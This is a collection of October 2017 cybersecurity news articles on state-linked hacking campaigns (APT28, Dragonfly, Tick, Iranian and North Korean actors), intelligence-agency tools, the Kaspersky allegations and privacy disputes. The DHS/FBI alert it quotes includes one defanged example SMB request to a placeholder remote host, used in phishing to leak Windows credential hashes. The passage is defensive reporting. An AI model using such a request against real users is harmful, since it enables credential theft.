“In the previous campaign where adversaries used Office document exploits as an infection vector, the payload was executed in the Office word process. In this campaign, adversaries did not use any exploit. Instead, the payload is executed in standalone mode by rundll32.exe,” researchers explained.

Seduploader is a reconnaissance malware capable of capturing screenshots, collecting and exfiltrating information about the system, executing code, and downloading files. The variant used in these attacks is slightly different compared to previously known samples, which is likely an attempt to evade detection.

The CCDCOE published an alert on its website on Monday to warn people interested in the CyCon conference about the attack.

“This is clearly an attempt to exploit the credibility of Army Cyber Institute and NATO CCDCOE in order to target high-ranking officials and experts of cyber security,” the organization said.

APT28 is not the only threat actor to use cyber security conferences as a lure in their operations. Last year, Palo Alto Networks reported that a China-linked espionage group known as Lotus Blossom, Elise and Esile had used fake invitations to the company’s Cybersecurity Summit to trick users into installing malware.


Assemblyline – Canada’s CSE intelligence Agency releases its malware analysis tool
23.10.2017 securityaffairs BigBrothers

Canada’s Communications Security Establishment (CSE) intel agency has released the source code for one of its malware analysis tools dubbed Assemblyline.
The Canada’s Communications Security Establishment (CSE) intelligence agency has released the source code for one of its malware detection and analysis tools dubbed Assemblyline.

The Assemblyline tool is written in Python and was developed under the CSE’s Cyber Defence program.

“This tool was developed within CSE’s Cyber Defence program to detect and analyse malicious files as they are received. As the Government of Canada’s centre of excellence in cybersecurity, CSE protects and defends the computer networks and electronic information of greatest importance to the Government of Canada.” states the Communications Security Establishment.”Our highly skilled staff works every day to protect Canada and Canadians from the most advanced cyber threats. Assemblyline is one of the tools we use.”

AssemblyLine malware tool

The Canadian intelligence agency described the analysis process as a conveyor belt, the files arrive in the system and are triaged in a sequence composed of the following phases:

Assemblyline generates information about each file and assigns a unique identifier that travels with the file as it flows through the system.
Users can add their own analytics, which we refer to as services, to Assemblyline. The services selected by the user in Assemblyline then analyze the files, looking for an indication of maliciousness and/or extracting features for further analysis.
The system can generate alerts about a malicious file at any point during the analysis and assigns the file a score.
The system can also trigger automated defensive systems to kick in. Malicious indicators generated by the system can be distributed to other defence systems.
Assemblyline recognizes when a file has been previously analysed.
The CSE decided of releasing the Assemblyline tool allowing anyone to customize the tools and deploy their own analytics into it.

The tool allows users to focus their efforts on the most harmful files, reducing the number of non-malicious files that experts have to inspect.

“The strength of Assemblyline is the ability of users to scale the system to their needs and the way that Assemblyline automatically rebalances its workload depending on the volume of files.” CSE added.” It reduces the number of non-malicious files that security analysts have to inspect, and permits users to focus their time and attention on the most harmful files, allowing them to spend time researching new cyber defence techniques,” CSE added.

The Assemblyline source code is available on BitBucket, users can modify it according to their needs.

Other intelligence agencies also released open source tools in the past, In November 2016, peers at the GCHQ released the CyberChef tool to analyze encryption, compression and decompression, and data formats.


A leaked document raises a doubt about NSA knew the #Krack attack since 2010
23.10.2017 securityaffairs BigBrothers

An NSA leaked document about the BADDECISION hacking tool raises the doubt about National Security Agency knew the Krack attack since 2010.
Security experts are questioning the NSA about the recently disclosed Krack attack the allows an attacker to decrypt information included in protected WPA2 traffic.

Security experts believe that the National Security Agency was aware of the flaw and its arsenal included a specific exploit.

An NSA spokesperson did not comment the claims, this is normal for the US intelligence agencies, but according to ZDNet, rumors that it knew something about the vulnerability in the WPA2 protocol are circulating in the intelligence community.

In some cases, the US intelligence even is informed of a vulnerability doesn’t disclose it in the attempt to exploit it for intelligence operations.

According to a top secret document leaked by the Edward Snowden and dated back 2010, the NSA arsenal included a hacking tool called BADDECISION classified as an “802.11 CNE tool. that used a true Man-in-the-middle attack and frame injection technique to redirect a target client to a FOXACID server.”

Baddecision NSA Krack attack

The NSA exploit was designed to target wireless networks by using a man-in-the-middle attack within range of the network, according to the Top-Secret slides it works for WPA and WAP2 networks, this implies that BADDECISION could bypass the encryption.

The FOXACID platform allows NSA operators to automatically supply the best malware for a specific target.

The slide said the hacking tool “works for WPA/WPA2,” suggesting that BADDECISION could bypass the encryption.

Cue the conspiracy theories. No wonder some thought the hacking tool was an early NSA-only version of KRACK.

Is BADDECISION the Krack attack tool?

Difficult to say, but many security researchers believe BADDECISION doesn’t exploit the KRACK attack.

According to former NSA staffers cited by ZDNet the NSA BADDECISION exploit is a sort of Ettercap tool that conducts man-in-the-middle attacks to carry out address resolution protocol (ARP) spoofing or poisoning.

Anyway, even if NSA BADDECISION doesn’t rely on the Krack attack, it is impossible to totally exclude that the agency was not aware of the vulnerability recently disclosed.


DHS and FBI warn of ongoing attacks on energy firms and critical infrastructure
23.10.2017 securityaffairs BigBrothers

The US DHS and the FBI have issued a warning that APT groups are actively targeting energy firms and critical infrastructure.
The US Department of Homeland Security (DHS) and the FBI have issued a warning that APT groups are actively targeting government departments, and firms working in the energy, nuclear, water, aviation, and critical manufacturing sectors.

The warning was sent to the organization via email on Friday to inform them of Advanced Persistent Threat Activity targeting energy and other critical infrastructure sectors since at least May 2017.

“Since at least May 2017, threat actors have targeted government entities and the energy, water, aviation, nuclear, and critical manufacturing sectors, and, in some cases, have leveraged their capabilities to compromise victims’ networks.” reads the alert.

“Analysis by DHS, FBI, and trusted partners has identified distinct indicators and behaviors related to this activity. Of specific note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. “

dragonfly 2 energy firms

The hackers use to target third-party suppliers and contractors (“staging targets”) to hit intended institution.

The attackers leverage the staging targets’ networks as pivot points and malware repositories when launching the attacks on their final intended victims.

According to the warning, the campaign is still ongoing, the government experts believe it is operated by the Dragonfly hacking group (aka Energetic Bear) that has been active since at least 2011 when it targeted defense and aviation companies in the US and Canada. Only in a second phase Dragonfly has focused its effort on US and European energy firms in early 2013.

In 2014, security experts at Symantec uncovered a new campaign targeting organizations located in the US, Italy, France, Spain, Germany, Turkey, and Poland.

Dragonfly gang conducted a cyber espionage campaign against energy grid operators, major electricity generation firms, petroleum pipeline operators, and energy industry industrial equipment providers.

According to the JAR report published by the US Department of Homeland Security, Dragonfly was Russian APT actor linked to the Government.

The infamous group remained under the radar since December 2015, but now the researchers pointed out Dragonfly targeted energy companies in Europe and the US.

In September 2017, the attackers aimed to control or even sabotage operational systems at energy facilities.

Back to the ongoing campaign, the attackers launched a spear-phishing campaign.

“Throughout the spear-phishing campaign, threat actors used email attachments to leverage legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server prior to retrieving the requested file.” states the alert. “(Note: It is not necessary for the file to be retrieved for the transfer of credentials to occur.) The threat actors then likely used password-cracking techniques to obtain the plaintext password. Once actors obtain valid credentials, they are able to masquerade as authorized users.”

APT28 hackers also used spear-phishing emails with a generic contract agreement in the form of a PDF that even if doesn’t include a malicious code prompts the victim to click a link which (via a shortened URL) downloads a malicious file.

The weaponized attachments may refer to legitimate curricula vitae CVs or resumés for industrial control systems personnel, invitations or policy documents designed to entice users into clicking on the attachment.

“The emails leveraged malicious Microsoft Word attachments that appear to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, as well as invitations and policy documents that entice the user to open the attachment. The list of file names has been published in the IOC.” continues the alert.

Attackers also used watering hole attacks, attackers compromise trade publications and informational websites related to process control, ICS, or critical infrastructure.

Much more detail, including indicators of compromise, filenames used in the attacks, and MD5 hashes, can be found in the alert published on US-CERT.


Canada's CSE Spy Agency Releases Malware Analysis Tool
20.10.2017 securityweek BigBrothers
Canada’s Communications Security Establishment (CSE) agency announced this week that the source code for one of its malware detection and analysis tools has been made public.

The Python-based tool released as open source by the spy agency is named Assemblyline and it was created within the CSE’s Cyber Defence program. The organization says this is one of the tools it uses to protect the country’s computer systems against advanced cyber threats.

Assemblyline allows defenders to automate the analysis of malicious files. The analysis process, which has been compared to a conveyor belt, involves assigning a unique identifier to files as they travel through the system, looking for signs of malicious functionality and extracting features for further analysis, generating alerts for malicious files and assigning them a score, and sending data to other protection systems so that identified threats can be neutralized.Assemblyline

Users can also add their own analytics, including custom-built software and antiviruses, to enhance Assemblyline’s capabilities.

“The strength of Assemblyline is the ability of users to scale the system to their needs and the way that Assemblyline automatically rebalances its workload depending on the volume of files. It reduces the number of non-malicious files that security analysts have to inspect, and permits users to focus their time and attention on the most harmful files, allowing them to spend time researching new cyber defence techniques,” CSE said.

The Assemblyline source code is available on BitBucket. Organizations can modify it to suit their needs or integrate it into existing solutions.

The CSE is a security and intelligence organization focused on collecting intel in support of the government’s priorities, and protecting the country’s most critical computer networks. While the spy agency has often been described as “super secret,” some insight into its activities was revealed by documents leaked a few years ago by former NSA contractor and whistleblower Edward Snowden.

The documents showed that the CSE had been analyzing a foreign espionage operation that it had linked to French intelligence. The campaign has since been investigated by many researchers and cybersecurity firms.

The CSE is not the only spy agency to release open source tools. Last year, the UK’s Government Communications Headquarters (GCHQ) made available CyberChef, a tool that allows both technical and non-technical people to analyze encryption, compression and decompression, and data formats.


G7 to Put Squeeze on Internet Giants at Terror Talks
20.10.2017 securityweek BigBrothers
Tech giants including Google, Facebook and Twitter will come under pressure in Italy this week to go further and faster in helping G7 powers tackle the ever-greater threat of extremists online.

A two-day meeting of Group of Seven interior ministers, which kicks off on the Italian island of Ischia on Thursday, comes just days after US-backed forces took full control of Raqa in Syria, which had become a byword for atrocities carried out by the Islamic State group.

Despite the breakthrough in the battle against IS, the head of Britain's domestic intelligence service said Tuesday that the UK was facing its most severe terrorist threat ever, particularly due to the spread of jihadist material online.

MI5 head Andrew Parker said attacks could now accelerate rapidly from inception to action, and "this pace, together with the way extremists can exploit safe spaces online, can make threats harder to detect".

In a first for a G7 meeting, representatives from Google, Microsoft, Facebook and Twitter will take part in the talks between the seven ministers from Britain, Canada, France, Germany, Italy, Japan and the United States.

"The internet plays a decisive role in radicalization. Over 80 percent of conversations and radicalisation happen online," said Italy's Marco Minniti, who is hosting the summit on the volcanic island off Naples.

- 'Wake up' -

"We need to study a system for automatically blocking specific content. IS contaminated the web with a 'terror malware'. The providers need to help us block this malware with an automatic antivirus," Minniti said.

"We don't want to impose anything, success will rely on us having a collaborative spirit," he added.

In June, Facebook, Microsoft, Twitter and YouTube announced the launch of an anti-terror partnership, the "Global Internet Forum to Counter Terrorism", aimed at thwarting the spread of extremist content online.

Facebook has launched campaigns in Belgium, Britain, France and Germany to develop "best practices".

And in September, Twitter touted victories in the battle against tweets promoting extremist violence, saying it has been vanquishing those kinds of accounts before governments even ask.

But last month top Western counter-terror chiefs said they need more support from social media companies to detect potential threats, particularly with jihadist attacks increasingly being carried out by home-grown "lone wolves".

Tough privacy laws and protections enjoyed by the largely US-based web giants are impeding authorities, they said.

Some firms are using software aimed at helping them quickly find and eliminate extremist content, developed by Dartmouth College computer science professor Hany Farid, a senior advisor to the US Counter Extremism Project.

But Farid told AFP it was unclear how broadly it was being deployed and urged the G7 to "give serious consideration to legislative relief" if the tech giants fail to "wake up and respond more aggressively" to abuses of their systems.

- Dark web vs 'likes' -

While some warn terror online will be difficult to conquer, with extremists simply moving onto the dark web, Italian expert Marco Lombardi said jihadists would not readily give up the mass-audience potential of social media.

Opportunities for "conversion, propaganda and dissemination" lie "on sites capable of influencing thousands of youngsters with a few 'likes'," said Lombardi, director of the research centre ITSTIME (Italian Team for Security, Terrorist Issues & Managing Emergencies).

The British government has outlined an internet safety strategy with proposals it will likely share with fellow G7 members, including an attempt to persuade leading web players to pay for measures to combat dangers.

While Germany has focused particularly on defending itself from cyber attacks, it launched the ZITis surveillance agency last month, which will specialise in "digital forensics" as part of its strategy to fight terrorism.

For its part, despite being labelled an enemy by IS, Japan has escaped attacks to date. Nevertheless, in June its lawmakers passed a controversial bill allowing authorities to target terror conspiracies.


Australia Spy Chief Warns of Growing Foreign Meddling
19.10.2017 securityweek BigBrothers
Foreign powers are waging an "extensive, unrelenting" campaign of espionage and meddling in Australia, notably targeting ethnic and religious minorities, the country's spy chief warned Thursday.

The Australian Security Intelligence Organisation (ASIO) said it was struggling to cope with the threat, with its resources stretched from fighting terrorism.

Spy chief Duncan Lewis said in a forward to ASIO's annual report that over the past year there had been a "steadily worsening overall security and operational environment".

He pinpointed heightened terror fears, but also growing foreign interference which was "extensive, unrelenting and increasingly sophisticated".

Overseas powers had sought classified information on Australia's alliances and partnerships, its position on diplomatic, economic and military issues, energy and mineral resources, and innovations in science and technology, he said.

"Espionage and foreign interference is an insidious threat -- activities that may appear relatively harmless today can have significant future consequences," he warned.

Officials last week revealed sensitive data about Australia's F-35 stealth fighter and P-8 surveillance aircraft programmes was stolen when a defence subcontractor was hacked using a tool widely used by Chinese cyber criminals.

Without naming any countries, Lewis pointed to "a number of states and other actors".

"Our investigations revealed countries undertaking intelligence operations to access sensitive Australian government and industry information," he said.

"We identified foreign powers clandestinely seeking to shape the opinions of members of the Australian public, media organisations and government officials in order to advance their country's own political objectives.

"Ethnic and religious communities in Australia were also the subject of covert influence operations designed to diminish their criticism of foreign governments," Lewis added.

He said the activities represented "a threat to our sovereignty, the integrity of our national institutions and the exercise of our citizens' rights".

The report comes after recent public warnings from Australian officials about the level of Chinese government interference on university campuses.

There are mounting concerns about the way Beijing uses nationalist student groups to monitor Chinese students, and challenge academics whose views do not align with Communist Party doctrine, particularly over issues such as Taiwan and border disputes.

Foreign Minister Julie Bishop stressed this week international students were welcome but Australia was a democracy and "we don't want to see freedom of speech curbed in any way involving foreign students or foreign academics".

According to state broadcaster ABC, Beijing's intrusion into Western universities has sparked a push by Australia's closest allies, including the US, Britain, Canada and New Zealand, for a more coordinated response to the tactics.

While foreign meddling was a major concern for ASIO, so was the heightened terror threat which was placing "considerable pressure" on the domestic spy agency.

Its report said three planned attacks in Australia were disrupted over the past 12 months, while highlighting concern about the growing influence of Islamic State in Southeast Asia.


Trump Team 'Dispels' EU Doubts on Data Protection Deal
19.10.2017 securityweek BigBrothers
US President Donald Trump's administration has "dispelled" doubts over whether it will stand by a hard-won personal data protection accord with Europe struck during Barack Obama's presidency, the EU said Wednesday.

But Brussels said it still wanted Washington to improve on a deal to protect European personal data transferred to the US by internet giants like Google and Facebook.

Last year's deal replaced a previous arrangement struck down by the bloc's top court, leaving the big companies unsure whether they could transfer data without facing a legal challenge.

However, Trump's "America first" policy, which has caused him to back out of agreements sealed by Obama, had raised European Union concerns.

"I can say that my second visit dispelled my doubts whether 'America First' does not mean 'America only'," EU Justice Commissioner Vera Jourova said at a press conference in Brussels.

Jourova said US Commerce Secretary Wilbur Ross and his team, whom she met last month in Washington, "have been very clear about their commitment to the privacy shield."

"And I got the feeling they understood the concerns Europeans have about the transfer of their personal data."

But she acknowledged there was "still some differences" between the two sides over the balance to strike between protecting privacy and ensuring security.

The European Commission, the executive of the 28-nation EU, said the deal "continues to ensure an adequate level of protection" for personal data transferred to firms in the US.

Jourova said the US, for example, has put in place ways in which EU individuals and firms can seek and obtain redress for complaints they may have with data transfers.

She added that more than 2,400 companies had already been certified by the US Commerce Department to participate in the scheme.

The commission said relevant US safeguards remained in place over access to personal data by US public authorities for national security reasons.

"But we also found space for improvement," Jourova added.

The commission recommended that US authorities do more to monitor whether companies were complying with their obligations under the deal as well as regularly search participating companies that make false claims.

It called for closer cooperation between relevant US authorities and their EU data protection counterparts.

Jourova urged Washington to name "as soon as possible" an ombudsman to tackle complaints from EU citizens, though there was "no concrete deadline".


Supreme Court Will Hear U.S. Vs Microsoft Privacy Case
18.10.2017 securityweek BigBrothers
World Will Watch the U.S. Government Vs Microsoft Played Out in the Supreme Court

The continuing battle between the U.S. government and Microsoft over access to private emails stored in Ireland is going to the Supreme Court. The case was accepted by the Supreme Court on Monday.

It began in 2013 when the government served a search warrant on Microsoft, seeking emails it believed would help in the prosecution of a drugs-trafficking case. Microsoft handed over relevant information stored in America, but declined to deliver emails stored in Ireland. It argued overreach, claiming that a search warrant could only apply within U.S. borders.

The government went to court to force Microsoft to comply. At first its warrant was upheld, but Microsoft appealed and the U.S. Court of Appeals for the 2nd Circuit subsequently overturned the ruling.

The basic arguments are relatively simple. The government contends that an inability to access evidence pertaining to U.S. means that "hundreds if not thousands of investigations of crimes -- ranging from terrorism, to child pornography, to fraud -- are being or will be hampered by the government's inability to obtain electronic evidence." It holds that the warrant is valid because the actual search would be conducted in the U.S.

Microsoft contends that the relevant law, the Stored Communications Act of 1986, was written in an age that had no concept of private emails being stored in different locations across the globe. But it also claims there are wider issues to consider. "If U.S. law enforcement can obtain the emails of foreigners stored outside the United States," wrote Microsoft's president and chief legal officer Brad Smith in a blog post yesterday, "what's to stop the government of another country from getting your emails even though they are located in the United States?"

The current laws were written for the era of the floppy disk, he added, "not the world of the cloud. We believe that rather than arguing over an old law in court, it is time for Congress to act by passing new legislation, such as the International Communications Privacy Act (ICPA) of 2017."

Writing in the Volokh Conspiracy blog yesterday, George Washington University law professor Orin Kerr points out that it is unusual for the Supreme Court to hear a case without lower court split. "It's typical for the justices to wait for lower courts to divide on an issue before they will step in," he wrote. "Relying on splits uses lower-court disagreement as a signal for the kind of difficult and important issues that the justices need to resolve." It is, he suggests, "a recognition among the justices of the tremendous importance of digital evidence collection. Whatever the right answers are, the justices need to provide them."

While the drama is being played out on the U.S. legal stage, it is being watched closely around the world -- and no more so than in Europe. Europe has a different attitude towards privacy than the U.S., typified first in the European Data Privacy Directive, and now in the European General Data Protection Regulation (GDPR). Both require that European personal data should not be exported to a location with lower privacy protections than in Europe. The U.S. is considered one such location.

To get round this potential impasse, Europe and the U.S. developed a Safe Harbor arrangement to allow American companies to export European data to servers in America; but this was thrown out by the European Court of Justice (the EU's equivalent to the Supreme Court) in September 2015. The primary reason was unfettered access to personal data by the U.S. government.

Since then the two governments have developed Privacy Shield as a stronger replacement for Safe Harbor -- but Privacy Shield has not yet been tested in the courts. Europe's reaction to the US government's potential ability to unilaterally extract European data from within Europe will test Privacy Shield to the limits.

"In a keenly watched case," summarizes Robert Cattanach, a partner at the international law firm Dorsey & Whitney, "the US Supreme Court has agreed to review a decision by the Second Circuit Court of Appeals that Microsoft did not have to turn over user data stored overseas in response to a search warrant issued under the Stored Communication Act. The case pits the interests of law enforcement access to information against concerns over government overreach, and could have ramifications globally as other nations likely will adapt their policies regarding access to information stored in other countries based on what the US Supreme Court decides. Privacy advocates have decried the prospect of borderless search authority by governments across the world, while law enforcement have painted the specter of criminal activities being shielded by convenient placement of data. All of this is being played out as the European Union continues its review of the Privacy Shield measure that allows the transfer of personal data of EU residents to the US under the presumption that it can be adequately protected."


Russia Fines Telegram For Not Giving Backdoor Access
16.10.2017 securityweek BigBrothers
A Russian court on Monday fined the popular Telegram messenger app for failing to provide the country's security services with encryption keys to read users' messaging data.

The court imposed an 800,000-ruble fine (about $14,000/12,000 euros) over Telegram's failure to "provide law enforcement agencies with information" about its users and their messages, TASS news agency reported.

The free instant messaging app, which lets people exchange messages, photos and videos in groups of up to 5,000 people, has attracted about 100 million users since its launch in 2013.

Telegram's self-exiled Russian founder Pavel Durov said in September the FSB had demanded backdoor access.

When Telegram did not provide the encryption keys, the FSB launched a formal complaint.

According to a scan of the complaint posted online by Durov, the FSB had sent a letter to Telegram in July demanding "information necessary to decode users' sent, received, delivered and processed electronic messages".

The fine is the latest move in an ongoing dispute between Telegram and the Russian authorities as Moscow pushes to increase surveillance of internet activities.

In June, Russia's state communications watchdog threatened to ban the app for failing to provide registration documents. Although Telegram later registered, it stopped short of agreeing to its data storage demands.

Companies on the register must provide the FSB with information on user interactions.

Starting from 2018, they must also keep all data from users in Russia according to controversial anti-terror legislation passed last year which was decried by internet companies and the opposition.

Telegram now has 10 days to appeal Monday's decision. If an appeal fails, the company will be given a grace period to hand over its encryption keys after which it could be blocked in Russia.

Asked about a potential block of the service, Kremlin spokesman Dmitry Peskov said: "As far as I know... there is no discussion of a block at this time."


'Tick' Cyber Espionage Group Linked to China
16.10.2017 securityweek BigBrothers
The cyber espionage group known as Bronze Butler and Tick continues to target Japan using custom-built malware. Evidence found by researchers suggests that the actor is based in China.

The first report on Tick was published in April 2016 by Symantec. However, the security firm pointed out at the time that the threat group had likely been active for at least a decade prior to its activities being discovered.

Tick has been known to use a downloader tracked as Gofarer and a data-stealing Trojan dubbed Daserf. A report published by Palo Alto Networks earlier this year linked the custom-built Daserf malware – based on command and control (C&C) servers – to a threat known as Minzen, XXMM, Wali and ShadowWali.

The first Tick attacks detailed by Symantec focused on technology, aquatic engineering, and broadcasting firms in Japan. Palo Alto Networks reported seeing campaigns aimed at defense and high-tech organizations in Japan and South Korea.

A new report published last week by SecureWorks links Tick to China based on several pieces of evidence. For example, the group uses T-SMB Scan tools created by a Chinese developer, an early version of the Minzen backdoor used Chinese characters in a service name, and there are links between Daserf and the NCPH group, which has been tied to the Chinese military.

Experts also pointed out that Tick activity has typically decreased during Chinese national holidays, and targeting intellectual property and economic intelligence from competing countries is something China has been known to do.

The attacks observed by the security firm were aimed at Japanese organizations in the critical infrastructure, manufacturing, heavy industry and international relations sectors. The hackers have mainly targeted intellectual property related to technology and development, business and sales information, emails and meeting schedules, product specifications, and network and system configuration files.

The report from SecureWorks also provides some information on Datper, a piece of malware used in 2016 and 2017, which experts believe was meant to replace Daserf. XXMM has been used by the threat actor in roughly the same period.

The Tick group has continued to use spear-phishing and watering hole attacks to breach the systems of its targets. However, SecureWorks has also seen attacks involving a zero-day vulnerability affecting a popular Japanese corporate tool.

The zero-day has been used to breach the systems of numerous Japanese organizations, but the hackers only proceeded with further activities in the case of companies that presented an interest. In some cases, the attackers managed to remain undetected within compromised networks for as much as five years.

Once it no longer needs any information from a target, Tick attempts to remove all evidence of its activities on the compromised networks.


Iranian hackers compromised the UK leader Theresa May’s email account along with other 9,000 emails
16.10.2017 securityaffairs BigBrothers

Iranian hackers compromised 9,000 UK emails in ‘brute force’ cyber attack that was initially attributed to Russian state-sponsored hackers.
On June 23, around 9,000 email accounts, including those belonging to Theresa May and other Cabinet Ministers, were hacked in the 12-hour “sustained and determined” attack cyber attack.

“According to intelligence officials, the cyberattack “bombarded parliamentary email accounts” but only compromised about 1 percent of the accounts it affected. The attack was initially thought to be the result of amateur hackers and not a nation-state.” reported the Hill.

According to The Times, the attack was initially attributed to Russia, but further investigation linked the offensive to Iranian hackers.

“Iran carried out a “brute force” cyberattack on parliament that hit dozens of MPs this summer, according to a secret intelligence assessment.” reported The Times

“Some 9,000 email accounts, including those belonging to Theresa May and other cabinet ministers, were subjected to a sustained attack on June 23. Ninety accounts were compromised.”

“Whitehall officials admitted it was inevitable that the hackers had obtained sensitive material,” the Times reported.

The investigation is still ongoing, for this reason, both The House of Commons and the National Cyber Security Centre did not comment the attack.

Iranian hackers hit UK parliament

The attack was discovered during a secret intelligence assessment, sources described the Iranian threat actors as “highly capable actors in the cyber world”.
“It was the not most sophisticated attack, but nor did it need to be.” a second source added. “It is possible they were simply testing their capability.”
The revelations come as Donald Trump has threatened to terminate the 2015 Iran nuclear deal if Congress and US allies fail to amend the agreement in significant ways.

The UK Prime Minister along with Angela Merkel and Emmanuel Macron insist preserving the pact due to the implications on “shared national security interest.”

A statement from the UK, France, and Germany said the International Atomic Energy Agency has “repeatedly confirmed” Iran’s compliance with the terms it signed up to.

Back to the cyber attack that hit 9,000 email accounts, there are various hypotheses about the attackers’ motivation.

The attack could be part of a wider cyber espionage campaign, but another concerning option is that Iran was trying to find embarrassing material to blackmail MPs.

Iranian hackers are becoming even more aggressive even if experts believe that they are not particularly sophisticated.

Recently we discussed the OilRig gang has been using a new Trojan in attacks aimed at targets in the Middle East.

OilRig is just one of the Iran-linked hacker crews, other groups tracked by security experts are APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


Kaspersky in Focus as US-Russia Cyber-Tensions Rise
15.10.2017 securityweek BigBrothers
The security software firm Kaspersky has become the focal point in an escalating conflict in cyberspace between the United States and Russia.

The Russian-based company has been accused of being a vehicle for hackers to steal security secrets from the US National Security Agency, and was banned by all American government agencies last month.

But it remains unclear if Kaspersky was part of a scheme or an unwilling accomplice in an espionage effort.

The software firm has argued it has no ties to any government and said in a recent statement it is simply "caught in the middle of a geopolitical fight."

But the latest accusations highlight what some see as a simmering cyberwar between the two powers.

Related: The Increasing Effect of Geopolitics on Cybersecurity

"Currently, we're losing," said James Lewis, a fellow with the Washington-based Center for Strategic and International Studies.

"It's not the kind of conflict we're used to."

The Kaspersky allegations come in the wake of an apparent Russian-led effort to manipulate social media and influence the 2016 US presidential election.

Russia has an advantage because "they have figured out how to use our civil liberties against us and there's not much we can do about it," Lewis said.

"We don't have a group that does this kind of psychological warfare and we don't have the legal authority to defend against it."

Peter Singer, a New America Foundation strategist and author who has written on 21st century warfare, agreed that Russia is gaining ground in this cyber conflict.

"If it's a 'cyberwar,' it is a akin to a Cold War-style back-and-forth of everything from stealing secrets to political influence operations," Singer said.

"Given that the Russians have so far got away with no real consequences for the biggest, most impactful operation, the hacks and influence campaign targeting the 2016 US election, I'd say they are doing pretty well."

- Cat-and-mouse game -

But Gabriel Weimann, a professor at Israel's University of Haifa and author who has written on cybersecurity, said it may be premature to declare Russia the winner.

"We don't really know the achievements of NSA in monitoring the web, this kind of information is secret," Weimann said.

"This is a cat-and-mouse game. You respond to breaking in and the other side responds and it becomes more dangerous and more sophisticated."

On Tuesday, the New York Times reported that Israeli intelligence had hacked into the Kaspersky network and upon detecting the Russian intrusion, alerted the United States, which led to a decision last month for Kaspersky software to be removed from US government computers.

The online news site CyberScoop, citing anonymous sources, reported separately this week that Kaspersky as early as 2015 sought to promote its anti-virus software as a tool to track extremists in the Middle East.

The report said that some US officials were intrigued by the offer, but that technical members of the intelligence community interpreted this as meaning that Kaspersky's anti-virus software could be used as a spying tool.

CyberScoop said that Russian officials from the FSB, the successor to the KGB, told US officials in 2015 not to interfere with Kaspersky software, a message that set off alarm bells.

The Wall Street Journal meanwhile reported that the Russian government was able to modify Kaspersky software to turn it into an espionage tool.

Anti-virus software such as those created by Kaspersky can become a tool for espionage because it scans and can access all files in a computer or network.

Eugene Kaspersky, founder of the company which bears his name, has long denied any connection to the Russian government but said on Twitter Monday he was launching an internal investigation into the latest allegations.

A company statement this week said, "Kaspersky Lab has never helped, nor will help, for any government in the world with its cyberespionage efforts, and contrary to erroneous reports, Kaspersky Lab software does not contain any undeclared capabilities such as backdoors as that would be illegal and unethical."

Weimann said he believes Kaspersky was likely "piggybacked" by the Russian government for espionage rather than a willing participant.

Lewis agreed, saying Kaspersky is probably "an unwilling tool" in the Russian espionage effort.

Lewis said that Eugene Kaspersky "would love to be (part of) a private company headquartered in London but the Russian government won't let him."


Spy vs Spy vs Spy as Israel Watches Russian Hackers: NYT
15.10.2017 securityweek BigBrothers
Israeli spies observed Russian government hackers in real time as they scoured computers around the world for the codenames of US intelligence programs, The New York Times reported Tuesday night.

The Russian intrusion detected more than two years ago used anti-virus software manufactured by the Russian firm Kaspersky Lab as an ad hoc global search tool, the Times said, quoting current and former government officials.

The software is used by 400 million people around the world, including by officials at some two dozen American government agencies, the Times reported.

Israeli intelligence had hacked into the Kaspersky network and upon detecting the Russian intrusion, alerted the United States. This led to a decision last month for Kaspersky software to be removed from US government computers, the Times said.

It is known that Russian hackers stole classified documents from a National Security Agency employee who had stored them on his home computer which featured Kaspersky antivirus software, the paper said.

It said that it is not yet publicly known what other secrets the Russians may have obtained from US government agencies by using Kaspersky software as "a sort of Google search for sensitive information."

The Times said Kaspersky Lab denied any knowledge of or involvement in the Russian hacking.


North Korean Hackers Targeted U.S. Electric Firms: Report
15.10.2017 securityweek BigBrothers
Hackers likely affiliated with the North Korean government seem to lack the ability to disrupt the U.S. power supply, according to a new report from FireEye.

The state-sponsored actors conducted a reconnaissance attack against electric companies in the United States on Sept. 22, 2017, via spear-phishing emails, but the incident did not lead to a disruption, the security company reports.

In fact, no evidence was found that North Korea-linked actors would even have the capability to compromise or manipulate the industrial control systems (ICS) networks that regulate the supply of power.

Attacks targeting the energy sector aren’t new, and FireEye says it has detected “more than 20 cyber threat groups suspected to be sponsored by at least four other nation-states attempting to gain access to targets in the energy sector that could have been used to cause disruptions.”

Given the current tensions with North Korea, the attacks should come at no surprise.

Utility executives worldwide fear that cyber-attacks could cause disruptions to electric distribution grids. To improve the resilience and security of critical energy infrastructure, the United States Department of Energy announced last month plans to invest over $20 million in cyber security.

Last month, Symantec warned of Russian hackers hitting the energy sector in the United States and other countries with a focus on gaining access to control systems. Iranian-backed cyber espionage actors were observed targeting energy organizations too, and so were Chinese hackers last year.

While North Korea-linked hackers were accused of targeting South’s nuclear power plants operated by Korea Hydro and Nuclear Power (KHNP), the attack apparently focused on stealing sensitive KHNP documents, “as part of an effort to exaggerate the access they had and embarrass the South Korean Government,” FireEye says.

The technique is apparently used by the North Korean government either to instill fear or to meet domestic propaganda purposes. Cyber actors linked to the country, however, don’t appear to possess the ability to take the technical and operational steps required in attacks aimed at disrupting energy sector operations.

The spear-phishing activity observed last month “was early-stage reconnaissance, and not necessarily indicative of an imminent, disruptive cyber-attack that might take months to prepare if it went undetected (judging from past experiences with other cyber threat groups),” the security researchers point out.

The suspected North Korean actions are supposedly part of an attempt to demonstrate a deterrent capability rather than the first stages of a larger attack. “For North Korea, even limited compromise of power companies would probably be exaggerated and hailed as a victory by Pyongyang,” FireEye says.

On the other hand, an increasing number of nation-states are developing the capability to disable the operations of power utilities. Moreover, because North Korea-linked actors are bold, they likely remain committed to targeting the energy sector, especially in South Korea and among the U.S. and its allies, the researchers believe.

These actors have already been associated with various cyber-attacks this year, including one targeting South’s wartime operational plans, and several hitting crypto-currency exchanges, possibly in an attempt to bolster finances. Hackers with ties to North Korea were also deemed a serious threat to banks earlier this year.

